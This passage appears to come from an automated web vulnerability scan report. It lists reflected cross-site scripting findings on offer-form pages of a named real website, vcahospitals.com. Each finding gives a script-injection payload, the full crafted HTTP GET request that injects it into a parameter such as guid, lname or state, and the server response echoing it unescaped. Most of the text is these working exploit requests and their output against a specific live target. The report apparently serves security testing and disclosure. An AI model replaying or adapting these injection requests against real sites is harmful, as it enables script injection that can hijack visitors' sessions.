   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3fa
...[SNIP]...

2.14. http://www.vcahospitals.com/hanson/offer.html [guid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the guid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1c92"><script>alert(1)</script>166b7134f96 was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:23 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=q7se0pt37ht32v8m7658nv8sm4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EBe1c92"><script>alert(1)</script>166b7134f96&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email
...[SNIP]...

2.15. http://www.vcahospitals.com/hanson/offer.html [ipaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the ipaddress request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5076b"><script>alert(1)</script>0fd887dd63 was submitted in the ipaddress parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:27 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2b7fn6e43qheokrevppr4nsb17; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
n" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.2435076b"><script>alert(1)</script>0fd887dd63&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%
...[SNIP]...

2.16. http://www.vcahospitals.com/hanson/offer.html [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the js request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b73"><script>alert(1)</script>c6690637939 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lutm9p0j05v6cj6vrgj8qkh9p2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
ame="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHO
...[SNIP]...

2.17. http://www.vcahospitals.com/hanson/offer.html [lname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16722"><script>alert(1)</script>2ea3b2459e0 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=16722"><script>alert(1)</script>2ea3b2459e0&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1o5ip8hjvq2ep4jaapvh990j72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="16722"><script>alert(1)</script>2ea3b2459e0" />
...[SNIP]...

2.18. http://www.vcahospitals.com/main/offer [ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2cb5"><script>alert(1)</script>58d69b46a2b was submitted in the parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?=3d2cb5"><script>alert(1)</script>58d69b46a2b&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:52 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3d2cb5"><script>alert(1)</script>58d69b46a2b&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.19. http://www.vcahospitals.com/main/offer [&optin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fd8"><script>alert(1)</script>96e4964cd43 was submitted in the &optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&optin=98fd8"><script>alert(1)</script>96e4964cd43&guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d7FB081CC-4889-473B-8B55-80F871DF3718%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3df59533da00809808fd0e36c2845bf10f%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=3459b82500bdac55498a24f3778782f7&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d1E049255-7B8D-4495-83A3-703E71767F97%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3db7ecd3da55c240fe68509bf0409ab225%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d%2526guid%253d7FB081CC-4889-473B-8B55-80F871DF3718%2526addr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253df59533da00809808fd0e36c2845bf10f%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253f%252526optin%25253d1%252526guid%25253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Cookie: PHPSESSID=7dralunqm62g71gllr4tjahje0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=98fd8"><script>alert(1)</script>96e4964cd43&guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fw
...[SNIP]...

2.20. http://www.vcahospitals.com/main/offer [&state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0508"><script>alert(1)</script>c935fdcf07e was submitted in the &state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FLf0508"><script>alert(1)</script>c935fdcf07e&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:05 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14497

